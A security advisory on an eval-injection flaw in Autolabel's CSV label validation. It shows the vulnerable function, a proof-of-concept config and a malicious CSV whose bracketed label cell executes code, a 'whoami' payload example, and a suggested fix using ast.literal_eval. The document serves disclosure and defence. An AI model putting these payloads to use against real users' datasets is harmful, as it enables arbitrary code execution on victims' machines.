SAI Security Advisory

Eval on CSV data allows arbitrary code execution in the ClassificationTaskValidate class

September 12, 2024

Products Impacted

This vulnerability is present in Autolabel v0.0.8 and newer.

CVSS Score: 7.8

AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE Categorization

CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)

Details

To exploit this vulnerability, an attacker would create a malicious CSV file and share it as a dataset with a victim, who would then load it for a classification task using Autolabel. The vulnerability exists in the validate function of the ClassificationTaskValidate class in the autolabel/src/autolabel/dataset/validation.py file (shown below).

def validate(self, value: str):
    """Validate classification

    A classification label(ground_truth) could either be a list or string
    """
    # TODO: This can be made better
    if value.startswith("[") and value.endswith("]"):
        try:
            seed_labels = eval(value)
            if not isinstance(seed_labels, list):
                raise
            unmatched_label = set(seed_labels) - self.labels_set
            if len(unmatched_label) != 0:
                raise ValueError(
                    f"labels: '{unmatched_label}' not in prompt/labels provided in config "
                )
        except SyntaxError:
            raise
    else:
        if value not in self.labels_set:
            raise ValueError(
                f"labels: '{value}' not in prompt/labels provided in config "
            )
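The bracket check offers no protection, because any Python expression wrapped in “[]” reaches eval. The following minimal sketch reproduces the sink outside of Autolabel; the value string is a stand-in for an attacker-controlled label cell, and the command shown is illustrative.

# `value` stands in for an attacker-controlled cell from the label column
value = "[__import__('os').system('whoami')]"

if value.startswith("[") and value.endswith("]"):
    # eval executes the embedded expression, so the attacker's command
    # runs before any label-matching logic can reject the value
    seed_labels = eval(value)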

When the victim loads the malicious CSV file, the contents of the label_column value in each row are passed to the validate function of the validator class selected by the task_type attribute. If a value is wrapped in brackets “[]”, it is passed to the eval function in the validate function of the ClassificationTaskValidate class, allowing arbitrary code execution on the victim’s device. An example configuration and an example malicious CSV are shown below.

from autolabel import AutolabelDataset

config = {
    "task_name": "ToxicCommentClassification",
    "task_type": "classification", # classification task
    "dataset": {
        "label_column": "label",
    },
    "model": {
        "provider": "openai",
        "name": "gpt-3.5-turbo" # the model we want to use
    },
    "prompt": {
        # very simple instructions for the LLM
        "task_guidelines": "Does the provided comment contain 'toxic' language? Say toxic or not toxic.",
        "labels": [ # list of labels to choose from
            "label",
            "not toxic"
        ],
        "example_template": "Text Snippet: {example}\nClassification: {label}\n{label}"
    }
}

AutolabelDataset('example.csv', config, validate=True)

example_config.py

example,label
hello,[print('\n\n\ncode execution\n\n\n') for a in ['a']]

example.csv
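No patched version is identified in this advisory. As a defensive sketch (an assumption on our part, not the project’s official fix), the eval call could be replaced with ast.literal_eval from the standard library, which parses only Python literals and raises ValueError for function calls and comprehensions rather than executing them:

import ast

def validate(self, value: str):
    """Validate classification without evaluating attacker-controlled code."""
    if value.startswith("[") and value.endswith("]"):
        try:
            # literal_eval only parses literals (lists, strings, numbers);
            # calls and comprehensions raise ValueError instead of running
            seed_labels = ast.literal_eval(value)
        except (ValueError, SyntaxError):
            raise ValueError(f"labels: '{value}' is not a valid label list")
        if not isinstance(seed_labels, list):
            raise ValueError(f"labels: '{value}' is not a list")
        unmatched_label = set(seed_labels) - self.labels_set
        if unmatched_label:
            raise ValueError(
                f"labels: '{unmatched_label}' not in prompt/labels provided in config "
            )
    elif value not in self.labels_set:
        raise ValueError(
            f"labels: '{value}' not in prompt/labels provided in config "
        )

With this change, the malicious CSV above fails validation with a ValueError instead of executing the payload.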
